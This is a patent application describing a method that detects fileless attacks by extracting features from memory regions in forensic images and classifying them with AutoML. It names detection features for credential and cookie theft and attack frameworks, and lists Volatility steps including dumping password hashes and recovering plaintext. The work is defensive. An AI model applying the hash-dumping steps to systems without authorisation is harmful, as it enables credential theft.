CN117478373A - File-free attack investigation method and system based on memory evidence obtaining - Google Patents


Info

Publication number
CN117478373A
Authority
CN
China
Prior art keywords
sample
memory
attack
file
model
Prior art date
Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
Pending
Application number
CN202311414040.6A
Other languages
Chinese (zh)
Inventor
冷涛
Current Assignee (The listed assignees may be inaccurate. Google has not performed a legal analysis and makes no representation or warranty as to the accuracy of the list.)
Sichuan Police College
Original Assignee
Sichuan Police College
Priority date (The priority date is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the date listed.)
Filing date
Publication date
Application filed by Sichuan Police College
Priority to CN202311414040.6A
Publication of CN117478373A
Legal status: Pending

Classifications

    • H: ELECTRICITY
    • H04: ELECTRIC COMMUNICATION TECHNIQUE
    • H04L: TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L63/00: Network architectures or network communication protocols for network security
    • H04L63/14: Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
    • H04L63/1408: Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic by monitoring network traffic
    • H04L63/1416: Event detection, e.g. attack signature detection
    • G: PHYSICS
    • G06: COMPUTING; CALCULATING OR COUNTING
    • G06F: ELECTRIC DIGITAL DATA PROCESSING
    • G06F21/00: Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
    • G06F21/50: Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems
    • G06F21/55: Detecting local intrusion or implementing counter-measures
    • G06F21/56: Computer malware detection or handling, e.g. anti-virus arrangements
    • G06F21/562: Static detection
    • H: ELECTRICITY
    • H04: ELECTRIC COMMUNICATION TECHNIQUE
    • H04L: TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L41/00: Arrangements for maintenance, administration or management of data switching networks, e.g. of packet switching networks
    • H04L41/16: Arrangements for maintenance, administration or management of data switching networks, e.g. of packet switching networks using machine learning or artificial intelligence
    • H: ELECTRICITY
    • H04: ELECTRIC COMMUNICATION TECHNIQUE
    • H04L: TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L63/00: Network architectures or network communication protocols for network security
    • H04L63/14: Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
    • H04L63/1441: Countermeasures against malicious traffic
    • H04L63/145: Countermeasures against malicious traffic the attack involving the propagation of malware through the network, e.g. viruses, trojans or worms
    • H: ELECTRICITY
    • H04: ELECTRIC COMMUNICATION TECHNIQUE
    • H04L: TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L63/00: Network architectures or network communication protocols for network security
    • H04L63/14: Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
    • H04L63/1441: Countermeasures against malicious traffic
    • H04L63/1466: Active attacks involving interception, injection, modification, spoofing of data unit addresses, e.g. hijacking, packet injection or TCP sequence number attacks
    • H: ELECTRICITY
    • H04: ELECTRIC COMMUNICATION TECHNIQUE
    • H04L: TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L63/00: Network architectures or network communication protocols for network security
    • H04L63/20: Network architectures or network communication protocols for network security for managing network security; network security policies in general
    • H: ELECTRICITY
    • H04: ELECTRIC COMMUNICATION TECHNIQUE
    • H04L: TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L9/00: Cryptographic mechanisms or cryptographic arrangements for secret or secure communications; Network security protocols
    • H04L9/40: Network security protocols
    • Y: GENERAL TAGGING OF NEW TECHNOLOGICAL DEVELOPMENTS; GENERAL TAGGING OF CROSS-SECTIONAL TECHNOLOGIES SPANNING OVER SEVERAL SECTIONS OF THE IPC; TECHNICAL SUBJECTS COVERED BY FORMER USPC CROSS-REFERENCE ART COLLECTIONS [XRACs] AND DIGESTS
    • Y02: TECHNOLOGIES OR APPLICATIONS FOR MITIGATION OR ADAPTATION AGAINST CLIMATE CHANGE
    • Y02D: CLIMATE CHANGE MITIGATION TECHNOLOGIES IN INFORMATION AND COMMUNICATION TECHNOLOGIES [ICT], I.E. INFORMATION AND COMMUNICATION TECHNOLOGIES AIMING AT THE REDUCTION OF THEIR OWN ENERGY USE
    • Y02D10/00: Energy efficient computing, e.g. low power processors, power management or thermal management

Landscapes

  • Engineering & Computer Science (AREA)
  • Computer Security & Cryptography (AREA)
  • Computer Hardware Design (AREA)
  • General Engineering & Computer Science (AREA)
  • Computer Networks & Wireless Communication (AREA)
  • Signal Processing (AREA)
  • Computing Systems (AREA)
  • Software Systems (AREA)
  • General Health & Medical Sciences (AREA)
  • Virology (AREA)
  • Health & Medical Sciences (AREA)
  • Theoretical Computer Science (AREA)
  • Artificial Intelligence (AREA)
  • Computer Vision & Pattern Recognition (AREA)
  • Databases & Information Systems (AREA)
  • Evolutionary Computation (AREA)
  • Medical Informatics (AREA)
  • Physics & Mathematics (AREA)
  • General Physics & Mathematics (AREA)
  • Data Exchanges In Wide-Area Networks (AREA)

Abstract

The invention provides a file-free attack investigation method and system based on memory forensics, and belongs to the technical field of network security attack investigation. First, benign samples are run and file-free attacks are carried out separately to obtain memory images. Second, each virtual address descriptor node of each memory image is taken as a sample, and the features of the memory region corresponding to the sample are extracted. The samples are then processed to construct a data set. The data set is divided into a training set and a test set, models are trained on the training set with an automatic machine learning library, the optimal model is selected, and the optimal model is applied to the test set to obtain a test result. Finally, the samples detected as malicious are verified and analyzed according to the test result. The invention detects attacks against specific memory regions in file-free attacks, assists attack investigators, strengthens the security defense capability of the system, protects key data from the threats posed by file-free attacks, and helps keep system operation stable and secure.

Description

File-free attack investigation method and system based on memory evidence obtaining
Technical Field
The invention belongs to the technical field of network security attack investigation, and particularly relates to a file-free attack investigation method and system based on memory forensics.
Background
Modern file-free malware uses various techniques to evade detection, and researchers have been exploring memory forensics as a way to detect such attacks. A common method extracts features with the existing plug-ins of the Volatility memory forensics framework and classifies them with machine learning algorithms; another method converts the memory image into a picture representation and detects attacks with deep learning. However, these methods either take the whole memory image as a sample to determine whether the host has been compromised, or take each process in the memory image as a sample to identify malicious processes. The detection granularity therefore remains coarse, and a specific memory region cannot be located. Further research is needed on fine-grained investigation of file-free attacks, so that malicious processes can be identified and malicious virtual memory regions pinpointed.
Disclosure of Invention
To address the above technical problems, the invention provides a file-free attack investigation method and system based on memory forensics, which help analysts investigate file-free malware attacks by extracting features and accurately identifying and locating suspicious memory regions.
The invention provides a file-free attack investigation method based on memory forensics, which comprises the following steps:
step S1: running benign samples and carrying out file-free attacks separately to obtain memory images; the file-free attack types comprise code injection, script attacks and living-off-the-land attacks; the memory images comprise malicious sample memory images and benign sample memory images;
step S2: taking each virtual address descriptor node of each memory image as a sample, and extracting the features of the memory region corresponding to the sample;
step S3: performing a de-duplication operation on the samples and a normalization operation on the numerical values of the samples to construct a data set;
step S4: dividing the data set into a training set and a test set, performing model training on the training set by using an automatic machine learning library, selecting an optimal model, and applying the optimal model to the test set for testing to obtain a test result;
step S5: performing verification analysis on the samples detected as malicious according to the test result.
Optionally, running benign samples and carrying out file-free attacks separately to obtain memory images specifically includes:
the file-free attack types comprise code injection, script attacks and living-off-the-land attacks;
the code injection features comprise functions, binaries, code, encryption information, countermeasures, memory, Trojans and attack frameworks;
the script attack features comprise malicious strings, neutral strings and scripts, which are respectively used for detecting malicious command-prompt scripts, neutral command-prompt scripts and other malicious scripts;
the living-off-the-land attack features comprise living-off-the-land binaries, remote desktop protocols and darknet communication protocols;
the memory images comprise malicious sample memory images and benign sample memory images.
Optionally, taking each virtual address descriptor node of each memory image as a sample and extracting the features of the memory region corresponding to the sample specifically includes:
acquiring a feature set of the memory region corresponding to the sample;
and writing a plug-in based on the memory forensics framework, and extracting the features in the feature set.
Optionally, performing a de-duplication operation on the samples and a normalization operation on the numerical values of the samples to construct a data set specifically includes:
converting the samples into set elements, removing duplicate items, and converting back to the original data type;
the normalization operation formula is:
$$x_{\text{norm}} = \frac{x - x_{\min}}{x_{\max} - x_{\min}}$$
wherein $x_{\text{norm}}$ is the result of the Min-Max normalization function, $x$ is the sample data, $x_{\max}$ is the maximum value of the sample data, and $x_{\min}$ is the minimum value of the sample data.
Optionally, dividing the data set into a training set and a test set, performing model training on the training set by using an automatic machine learning library, selecting an optimal model, and applying the optimal model to the test set for testing to obtain a test result specifically includes:
dividing the data set into a training set and a test set, with the samples assigned at random;
performing model training on the training set by using an automatic machine learning library, comparing the evaluation indexes of the different models according to the output results, and selecting the model with the highest precision on the training set as the optimal model;
applying the optimal model to the test set to obtain the prediction output of the optimal model, and calculating the evaluation indexes of the optimal model on the test set;
judging whether the optimal model reaches the expected target according to the evaluation indexes on the test set; if not, adjusting the parameters and retraining and retesting; if so, deploying the model to the actual application.
The invention also provides a file-free attack investigation system based on memory forensics, which comprises:
a memory image acquisition module, used for running benign samples and carrying out file-free attacks separately to obtain memory images; the file-free attack types comprise code injection, script attacks and living-off-the-land attacks; the memory images comprise malicious sample memory images and benign sample memory images;
a feature extraction module, used for taking each virtual address descriptor node of each memory image as a sample and extracting the features of the memory region corresponding to the sample;
a data processing module, used for performing a de-duplication operation on the samples and a normalization operation on the numerical values of the samples to construct a data set;
an automatic machine learning module, used for dividing the data set into a training set and a test set, performing model training on the training set by using an automatic machine learning library, selecting an optimal model, and applying the optimal model to the test set for testing to obtain a test result;
and a verification analysis module, used for performing verification analysis on the samples detected as malicious according to the test result.
Optionally, the memory image acquisition module specifically includes:
the file-free attack types comprise code injection, script attacks and living-off-the-land attacks;
the code injection features comprise functions, binaries, code, encryption information, countermeasures, memory, Trojans and attack frameworks;
the script attack features comprise malicious strings, neutral strings and scripts, which are respectively used for detecting malicious command-prompt scripts, neutral command-prompt scripts and other malicious scripts;
the living-off-the-land attack features comprise living-off-the-land binaries, remote desktop protocols and darknet communication protocols;
the memory images comprise malicious sample memory images and benign sample memory images.
Optionally, the feature extraction module specifically includes:
a feature set acquisition sub-module, used for acquiring a feature set of the memory region corresponding to the sample;
and a feature extraction sub-module, used for writing a plug-in based on the memory forensics framework and extracting the features in the feature set.
Optionally, the data processing module specifically includes:
a de-duplication sub-module, used for converting the samples into set elements, removing duplicate items and converting back to the original data type;
the normalization operation formula is:
$$x_{\text{norm}} = \frac{x - x_{\min}}{x_{\max} - x_{\min}}$$
wherein $x_{\text{norm}}$ is the result of the Min-Max normalization function, $x$ is the sample data, $x_{\max}$ is the maximum value of the sample data, and $x_{\min}$ is the minimum value of the sample data.
Optionally, the automatic machine learning module specifically includes:
a data set dividing sub-module, used for dividing the data set into a training set and a test set, with the samples assigned at random;
a model training sub-module, used for performing model training on the training set by using an automatic machine learning library, comparing the evaluation indexes of the different models according to the output results, and selecting the model with the highest precision on the training set as the optimal model;
a model test sub-module, used for applying the optimal model to the test set to obtain the prediction output of the optimal model, and calculating the evaluation indexes of the optimal model on the test set;
a model judging sub-module, used for judging whether the optimal model reaches the expected target according to the evaluation indexes on the test set; if not, adjusting the parameters and retraining and retesting; if so, deploying the model to the actual application.
Compared with the prior art, the invention has the following beneficial effects:
The file-free attack investigation system of the invention covers process injection, script-based attacks and living-off-the-land attacks, so its detection value is higher than that of methods aimed only at memory injection. Memory descriptors (memory regions) are taken as samples, each sample covering a specific memory region of a specific process, so malicious memory regions are identified automatically; this guides attack investigators to analyze the content of those regions in depth with memory forensics and reduces analysts' workload. A custom plug-in based on the Volatility memory forensics tool is implemented to extract features from memory images. In addition, multiple types of file-free attacks are carried out to construct a memory image data set.
Drawings
FIG. 1 is a flow chart of a file-free attack investigation method based on memory evidence obtaining in the invention;
FIG. 2 is a block diagram of a file-free attack investigation system based on memory evidence obtaining according to the present invention;
FIG. 3 is a Python-based file-less attack survey of the present invention;
FIG. 4 is a schematic diagram of an attack order according to the present invention;
FIG. 5 is a diagram of malicious script content according to the present invention.
Detailed Description
The invention is further described below in connection with specific embodiments and the accompanying drawings, but the invention is not limited to these embodiments.
Example 1
As shown in fig. 1, the invention discloses a file-free attack investigation method based on memory forensics, which comprises the following steps:
Step S1: running benign samples and carrying out file-free attacks separately to obtain memory images; the file-free attack types comprise code injection, script attacks and living-off-the-land attacks; the memory images comprise malicious sample memory images and benign sample memory images.
Step S2: taking each virtual address descriptor node of each memory image as a sample, and extracting the features of the memory region corresponding to the sample.
Step S3: performing a de-duplication operation on the samples and a normalization operation on the numerical values of the samples to construct a data set.
Step S4: dividing the data set into a training set and a test set, performing model training on the training set by using an automatic machine learning library, selecting an optimal model, and applying the optimal model to the test set for testing to obtain a test result.
Step S5: performing verification analysis on the samples detected as malicious according to the test result.
The steps are discussed in detail below:
Step S1: running benign samples and carrying out file-free attacks separately to obtain memory images.
The step S1 specifically comprises the following steps:
The code injection detection features include API (function), binary, code, cryptographic information, countermeasure, memory and Trojan features, as well as detection of the existing attack frameworks Metasploit and Cobalt Strike.
To detect malicious script attacks, three features are designed: malicious strings, neutral strings and scripts, used to detect malicious PowerShell scripts, neutral PowerShell scripts and other types of malicious scripts respectively. For the malicious document attack vector in file-free attacks, the mal_doc (malicious document) feature is developed, with YARA rules constructed to identify known CVE vulnerabilities and malicious VBA usage in a memory region.
To detect living-off-the-land attacks, the LOLBins (living-off-the-land binaries) feature is defined and YARA rules are designed to detect whether LOLBins are present in a memory region. In addition, the vnc_dark feature is designed, which detects whether VNC (a remote desktop protocol) or darknet protocols are present in the memory region.
The memory images are acquired on the target system by running benign samples and carrying out file-free attacks separately, without triggering any file monitoring or protection mechanism. A memory image is a file that stores all data and state in system memory at a given moment; it can be used to analyze the running condition of the system or to restore the system state.
Two types of memory images are acquired: malicious sample memory images and benign sample memory images. A malicious sample memory image is the memory image of a system that is infected or affected by a file-free attack, and may contain traces of malicious code or abnormal behavior. A benign sample memory image is the memory image of a system that is not infected or affected by a file-free attack, and contains no traces of malicious code or abnormal behavior.
In this embodiment, the file-free attack types include code injection, script attacks and living-off-the-land attacks; the memory images include malicious sample memory images and benign sample memory images.
Following the behavior of real attackers, file-free attacks are simulated on a virtual machine; after an attack is completed, a memory snapshot is taken to obtain the memory image of the malicious sample. Benign samples are likewise executed and their memory images captured. Because the trigger conditions of file-free attacks vary, the attacks are executed manually, and the memory image is collected while the attack connection is still active. Benign sample execution and memory image acquisition are automated with scripts.
Step S2: taking each virtual address descriptor node of each memory image as a sample, and extracting the features of the memory region corresponding to the sample.
The step S2 specifically comprises the following steps:
A virtual address descriptor (VAD) is a data structure that describes the attributes and state of a memory region in a process's virtual address space. The VAD tree is a balanced binary tree that stores and manages all VAD nodes of a process. Traversing the VAD tree yields information on all memory regions of the process, including the start address, end address, protection attributes, memory type, memory state and mapped file. Each VAD node of each memory image is taken as a sample, and the features of the corresponding memory region are extracted for subsequent machine learning analysis. The extracted features include the following:
Basic features, including the size, protection attributes, memory type and memory state of the memory region, which reflect the basic attributes and use of the region.
Content features, including strings, binary data, API calls and sensitive information in the memory region, which reflect the specific content and functions of the region.
Behavior features, including code execution, code injection, code modification and code obfuscation in the memory region, which reflect dynamic behavior and anomalies in the region.
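As a rough illustration of taking each VAD node as a sample, the sketch below walks a toy binary tree in order and emits one record of basic features per node. The `VadNode` class, its fields, the process ID and the addresses are hypothetical stand-ins; a real VAD node is a kernel structure parsed by a memory forensics framework, and the end address is assumed here to be inclusive.

```python
from dataclasses import dataclass
from typing import Iterator, Optional


@dataclass
class VadNode:
    """Simplified, hypothetical stand-in for one VAD node."""
    start: int                      # first address of the region
    end: int                        # last address of the region (assumed inclusive)
    protection: str                 # e.g. "PAGE_READWRITE"
    private: bool                   # True if the region is private memory
    left: Optional["VadNode"] = None
    right: Optional["VadNode"] = None


def walk_vad_tree(node: Optional[VadNode]) -> Iterator[VadNode]:
    """In-order traversal: yields nodes in ascending start-address order."""
    if node is None:
        return
    yield from walk_vad_tree(node.left)
    yield node
    yield from walk_vad_tree(node.right)


def basic_features(pid: int, node: VadNode) -> dict:
    """One sample = one memory region of one process."""
    return {
        "pid": pid,
        "start": node.start,
        "end": node.end,
        "size": node.end - node.start + 1,
        "protection": node.protection,
        "private": int(node.private),
    }


# Toy tree with three regions for a hypothetical process 1234.
root = VadNode(
    0x20000, 0x2FFFF, "PAGE_READWRITE", True,
    left=VadNode(0x10000, 0x10FFF, "PAGE_READONLY", False),
    right=VadNode(0x30000, 0x30FFF, "PAGE_EXECUTE_READWRITE", True),
)
samples = [basic_features(1234, n) for n in walk_vad_tree(root)]
```

Keeping the process ID and the start and end addresses in every record is what lets a later prediction be traced back to a specific region of a specific process.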
Acquiring the feature set of the memory region corresponding to the sample specifically comprises the following:
The memory feature set of the memory region is obtained, comprising eleven features: is_spark, protection, hbcia_structures, tag, mem_map, threads, private, network_structures, persistence, visual_structures and is_map. Of these, is_spark, protection, tag, mem_map, threads, private and is_map are obtained from statistical information or by reading the memory state, while hbcia_structures, network_structures, visual_structures and persistence are obtained by constructing YARA rules to scan the memory region.
The function feature set of the memory region is obtained, comprising three features: api_general_string, api_dynamic_loading and api_mapping, which are obtained by constructing regular expressions or by YARA rule matching.
The binary feature set of the memory region is obtained, comprising seven features: pe_or_dll, is_module, exports, has_header, is_dynamic_library, imports and width_header, each determined by reading a specific field or flag.
The code feature set of the memory region is obtained, comprising five features: direct_calls, direct_jmps, functions, shellcodes and hooks; the first two are matched with regular expressions and the last three with YARA rules.
The countermeasure feature set of the memory region is obtained, comprising three features: debug, sadbox and vm, all matched with YARA rules.
The encryption information feature set of the memory region is obtained, comprising three features: cipher, encoding and mapping, all matched with YARA rules.
The Trojan feature set of the memory region is obtained, comprising two features: cookies and crendials, which are extracted with YARA rules.
The file-free feature set of the memory region is obtained, comprising eight features: msf, cobalt, malstring, neutral, script, lobin, mal_doc and vnc_dark, all matched with YARA rules.
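To make the pattern-matching idea concrete, here is a minimal sketch that derives a few of the named features from the raw bytes of one memory region. The byte patterns are assumptions chosen for illustration (x86 `CALL rel32` and `JMP rel32` opcodes, the `MZ` magic, a case-insensitive "powershell" string); the text does not give the actual regular expressions or YARA rules, and a plain regular expression stands in for YARA here.

```python
import re

# Hypothetical patterns, for illustration only.
DIRECT_CALL = re.compile(rb"\xe8[\x00-\xff]{4}")   # x86 CALL rel32: E8 + 4-byte offset
DIRECT_JMP = re.compile(rb"\xe9[\x00-\xff]{4}")    # x86 JMP rel32: E9 + 4-byte offset
SCRIPT_HINT = re.compile(rb"powershell", re.IGNORECASE)


def extract_features(region: bytes) -> dict:
    """Return a small feature vector for one memory region."""
    return {
        # 1 if the region starts with the DOS/PE "MZ" magic
        "has_header": int(region[:2] == b"MZ"),
        # counts of byte sequences that look like direct calls and jumps
        "direct_calls": len(DIRECT_CALL.findall(region)),
        "direct_jmps": len(DIRECT_JMP.findall(region)),
        # 1 if a script-related string is present
        "script": int(SCRIPT_HINT.search(region) is not None),
    }


region = (
    b"MZ" + b"\x90" * 4
    + b"\xe8\x01\x00\x00\x00"      # one call-like sequence
    + b"\xe9\x02\x00\x00\x00"      # one jump-like sequence
    + b"PowerShell -enc"
)
features = extract_features(region)
```

Matching opcodes on raw bytes over-counts, since data bytes can look like instructions; a disassembler would be more precise at higher cost.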
In this embodiment, a memory image captures the data of all processes on the host. The host runs multiple processes, and each process has multiple virtual address descriptors, each describing one memory region (a start address and an end address). By taking the virtual address descriptor as a sample, a specific memory region of a specific process can be located.
In this embodiment, the feature design of the memory region is shown in Table 1: forty-two features in eight categories. The feature sets are the memory, function, binary, code, encryption information, countermeasure, Trojan and file-free feature sets.
Table 1. Feature design of memory regions
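The categories and feature names listed above can be collected into a single lookup structure, which also makes the stated totals easy to check. This is only an organizational sketch: the dictionary keys are labels chosen here, and the feature names are transcribed exactly as they appear in the text.

```python
# Feature names copied verbatim from the description; category keys are illustrative labels.
FEATURE_SETS = {
    "memory": ["is_spark", "protection", "hbcia_structures", "tag", "mem_map",
               "threads", "private", "network_structures", "persistence",
               "visual_structures", "is_map"],
    "function": ["api_general_string", "api_dynamic_loading", "api_mapping"],
    "binary": ["pe_or_dll", "is_module", "exports", "has_header",
               "is_dynamic_library", "imports", "width_header"],
    "code": ["direct_calls", "direct_jmps", "functions", "shellcodes", "hooks"],
    "countermeasure": ["debug", "sadbox", "vm"],
    "encryption": ["cipher", "encoding", "mapping"],
    "trojan": ["cookies", "crendials"],
    "file_free": ["msf", "cobalt", "malstring", "neutral", "script", "lobin",
                  "mal_doc", "vnc_dark"],
}

# Flat, ordered column list for a feature matrix, e.g. "code.direct_calls".
COLUMNS = [f"{category}.{name}"
           for category, names in FEATURE_SETS.items()
           for name in names]

category_count = len(FEATURE_SETS)
feature_count = len(COLUMNS)
```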
Writing the plug-in based on the memory forensics framework and extracting the features specifically comprises the following:
A custom memory forensics plug-in is written for the open-source memory forensics tool Volatility, and the features in the feature sets are extracted with it.
Step S3: performing a de-duplication operation on the samples and a normalization operation on the numerical values of the samples to construct a data set.
The step S3 specifically comprises the following steps:
The samples are converted into set elements, duplicate items are removed, and the result is converted back to the original data type.
In this embodiment, a set data structure is used: the samples are converted into set elements, duplicates are removed automatically, and the set is then converted back to the original data type. This approach exploits the defining property of a set, namely that its elements are unordered and cannot repeat, so duplicate samples are dropped as soon as the samples are inserted into the set. The method is simple and easy to use, with low additional time and space cost.
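A minimal sketch of this set-based de-duplication, assuming each sample is a list of numeric feature values. Lists are not hashable, so each row is converted to a tuple first; the final `sorted` call is an addition made here to get a reproducible order, since a set does not preserve insertion order.

```python
def deduplicate(samples):
    """Remove duplicate feature rows by round-tripping through a set."""
    unique_rows = set(tuple(row) for row in samples)   # duplicates collapse here
    return [list(row) for row in sorted(unique_rows)]  # back to a list of lists


samples = [
    [4096, 1, 0],
    [8192, 0, 1],
    [4096, 1, 0],   # exact duplicate of the first row
]
deduped = deduplicate(samples)
```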
The normalization operation formula is:
$$x_{\text{norm}} = \frac{x - x_{\min}}{x_{\max} - x_{\min}}$$
wherein $x_{\text{norm}}$ is the result of the Min-Max normalization function, $x$ is the sample data, $x_{\max}$ is the maximum value of the sample data, and $x_{\min}$ is the minimum value of the sample data.
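The Min-Max normalization described here can be sketched for a single feature column as follows. Returning zeros for a constant column (where the maximum equals the minimum) is an assumption made here to avoid division by zero; the text does not say how that case is handled.

```python
def min_max_normalize(values):
    """Scale a feature column into [0, 1] using (x - min) / (max - min)."""
    lo, hi = min(values), max(values)
    if hi == lo:
        # Constant column: assumed convention, map every value to 0.0.
        return [0.0 for _ in values]
    return [(v - lo) / (hi - lo) for v in values]


region_sizes = [4096, 8192, 12288]
normalized = min_max_normalize(region_sizes)
```

For the three region sizes above, the smallest maps to 0, the largest to 1, and the middle value to 0.5.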
Step S4: dividing the data set into a training set and a test set, performing model training on the training set by using an automatic machine learning library, selecting an optimal model, and applying the optimal model to the test set for testing to obtain a test result.
The step S4 specifically comprises the following steps:
The data set is divided into a training set and a test set, with samples assigned at random in a fixed proportion (e.g., 80% and 20%) to ensure that the training set and the test set are representative and independent.
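A random 80/20 split can be sketched with the standard library alone. The function name, the fixed seed and the rounding rule are choices made for this illustration; machine learning libraries offer equivalent helpers.

```python
import random


def split_dataset(samples, test_ratio=0.2, seed=42):
    """Shuffle a copy of the samples and split it into (train, test)."""
    shuffled = list(samples)
    random.Random(seed).shuffle(shuffled)       # seeded for reproducibility
    n_test = round(len(shuffled) * test_ratio)
    return shuffled[n_test:], shuffled[:n_test]


dataset = list(range(10))                        # ten placeholder samples
train_set, test_set = split_dataset(dataset)
```

Because the two parts are slices of one shuffled list, no sample can land in both, which is the independence the text asks for.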
Model training is performed on the training set using an automatic machine learning (AutoML) library. AutoML automates the machine learning process, including data preprocessing, feature engineering, model selection and hyperparameter optimization. It saves the time and cost of manually tuning models and can improve model performance and interpretability.
The optimal model (extremely randomized trees in this embodiment) is selected: the evaluation indexes (such as accuracy, recall and F1 score) of the different models output by AutoML are compared, and the model with the best performance on the training set is selected as the optimal model.
The optimal model is applied to the test set: the test set data are used as input to obtain the model's predictions, which are compared with the true labels of the test set to calculate the model's evaluation indexes on the test set; these reflect the generalization ability and stability of the model.
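The comparison of evaluation indexes can be illustrated without any AutoML library. The sketch below computes precision, recall and F1 from predicted and true labels and picks the candidate with the highest F1; the model names and prediction vectors are made up, and ranking by F1 on a single labelled set is a simplification of the train-then-test procedure described above.

```python
def evaluate(y_true, y_pred):
    """Precision, recall and F1 for the malicious class (label 1)."""
    tp = sum(1 for t, p in zip(y_true, y_pred) if t == 1 and p == 1)
    fp = sum(1 for t, p in zip(y_true, y_pred) if t == 0 and p == 1)
    fn = sum(1 for t, p in zip(y_true, y_pred) if t == 1 and p == 0)
    precision = tp / (tp + fp) if tp + fp else 0.0
    recall = tp / (tp + fn) if tp + fn else 0.0
    f1 = (2 * precision * recall / (precision + recall)
          if precision + recall else 0.0)
    return {"precision": precision, "recall": recall, "f1": f1}


# Hypothetical labels (1 = malicious region) and candidate predictions.
y_true = [1, 1, 1, 0, 0, 1]
candidates = {
    "model_a": [1, 1, 0, 0, 1, 1],
    "model_b": [1, 1, 1, 0, 0, 0],
}
scores = {name: evaluate(y_true, pred) for name, pred in candidates.items()}
best_model = max(scores, key=lambda name: scores[name]["f1"])
```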
The test result is obtained, and whether the model reaches the expected target is judged according to the evaluation indexes on the test set. If not, the AutoML parameters or the data set are adjusted and training and testing are repeated. If so, the model can be deployed to the actual application.
In this embodiment, experiments on file-free attacks yielded an AUC of 98%, a recall of 93%, a precision of 96.4% and an F1 score of 94.7%.
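As a consistency check on the reported figures, the F1 score can be recomputed from the stated precision $P = 0.964$ and recall $R = 0.93$ using the standard definition of F1 as their harmonic mean:

$$F_1 = \frac{2PR}{P + R} = \frac{2 \times 0.964 \times 0.93}{0.964 + 0.93} = \frac{1.79304}{1.894} \approx 0.947$$

This agrees with the reported F1 score of 94.7%.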
Step S5: performing verification analysis on the samples detected as malicious, according to the test result.
Step S5 specifically comprises the following:
Based on the test result, some samples are determined to be malicious. These samples require further verification to confirm whether they contain malicious code, malicious behavior, or features related to known attack payloads; specialized security tools and memory forensics may be used to analyze the content and structure of each sample.
When Volatility is used, the file path of the memory image and the version of the operating system need to be specified so that the memory structures are identified correctly. For example, if the memory image file is memory.img and the operating system is Windows 10, the following command can be used:
volatility -f memory.img --profile=Win10x64
Memory forensics is performed: the malicious memory samples are analyzed and examined in depth using memory forensics techniques. By extracting key information from memory, such as processes, threads, registry data, and network connections, the behavior and activity of the malicious samples in the system can be understood and their likely attack payloads identified.
Using Volatility plug-ins, verification analysis can be performed on malicious memory samples, for example:
Whether an abnormal or hidden process is running can be checked with the pslist or psscan plug-in, recording its process ID and name.
Whether an abnormal or unknown network connection or socket exists can be checked with the netscan plug-in, recording the associated process and remote address.
Whether abnormal or suspicious command-line parameters or dynamic link libraries exist can be checked with the cmdline or dlllist plug-in, recording their paths or contents.
Whether malicious code has been injected or API hooks exist can be checked with the malfind or apihooks plug-in, and the malicious code can be dumped to a file for disassembly or decompilation.
Whether abnormal or modified registry keys exist can be checked with the hivelist or printkey plug-in, recording their key values or data.
Whether user account password hashes have been stolen or cracked can be checked with the hashdump plug-in, and recovery of the plaintext passwords can be attempted.
The virtual address descriptor (VAD) contents of a process can be dumped to files with the vaddump plug-in, which can be used to extract data from memory regions that are not mapped to a file, such as the heap, the stack, or injected code.
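The plug-in checks above can be scripted by generating one command line per plug-in. The sketch below only builds argument lists in the `volatility -f <image> --profile=<profile> <plugin>` form used in this description (Volatility 2 style) and does not run them. The helper name `volatility_command` and the `TRIAGE_PLUGINS` table are assumptions for illustration; the purposes listed simply restate the text.

```python
def volatility_command(image, profile, plugin, extra_args=()):
    """Build an argument list for one Volatility 2 style plug-in run."""
    return ["volatility", "-f", image, "--profile=" + profile, plugin, *extra_args]


# Plug-ins named in the description, with the question each one helps answer.
TRIAGE_PLUGINS = {
    "pslist": "listed processes",
    "psscan": "hidden or terminated processes",
    "netscan": "network connections and sockets",
    "cmdline": "process command-line parameters",
    "dlllist": "loaded dynamic link libraries",
    "malfind": "injected code regions",
    "apihooks": "API hooks",
    "hivelist": "registry hives",
    "hashdump": "account password hashes",
}

for plugin, purpose in TRIAGE_PLUGINS.items():
    argv = volatility_command("memory.img", "Win10x64", plugin)
    print(" ".join(argv), " #", purpose)
```

Each list can be passed to `subprocess.run` on a forensic workstation where the tool is installed. Plug-ins such as printkey or vaddump need further options, which would go in `extra_args`.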
Threats are identified and addressed: based on the result of the verification analysis, the security threats present in the system are identified and a corresponding response strategy is formulated. This may include fixing system vulnerabilities, updating security policies, and strengthening network monitoring, in order to improve the system's defenses and reduce future security risks.
Example 2
As shown in fig. 2, the present invention discloses a file-free attack investigation system based on memory evidence obtaining, the system comprising:
The memory image acquisition module 10 is configured to run benign samples and carry out file-free attacks, respectively, to obtain memory images; the file-free attack types include code injection, script attacks, and living-off-the-land attacks; the memory images include malicious sample memory images and benign sample memory images.
The feature extraction module 20 is configured to take each virtual address descriptor node of a memory image as a sample and extract the features of the memory region corresponding to the sample.
The data processing module 30 is configured to perform a deduplication operation on the samples and a normalization operation on the numerical values of the samples, so as to construct a data set.
The automatic machine learning module 40 is configured to divide the data set into a training set and a test set, perform model training on the training set using an automatic machine learning library, select an optimal model, and apply the optimal model to the data set for testing, so as to obtain a test result.
The verification analysis module 50 is configured to perform verification analysis on the samples detected as malicious, according to the test result.
As an alternative embodiment, the memory image acquisition module 10 of the present invention is specified as follows:
The file-free attack types include code injection, script attacks, and living-off-the-land attacks.
The code injection features include functions, binaries, code, encryption information, countermeasures, memory, Trojans, and attack frameworks.
The script attack features include malicious strings, neutral strings, and scripts, which are used respectively to detect malicious command prompt scripts, neutral command prompt scripts, and other malicious scripts.
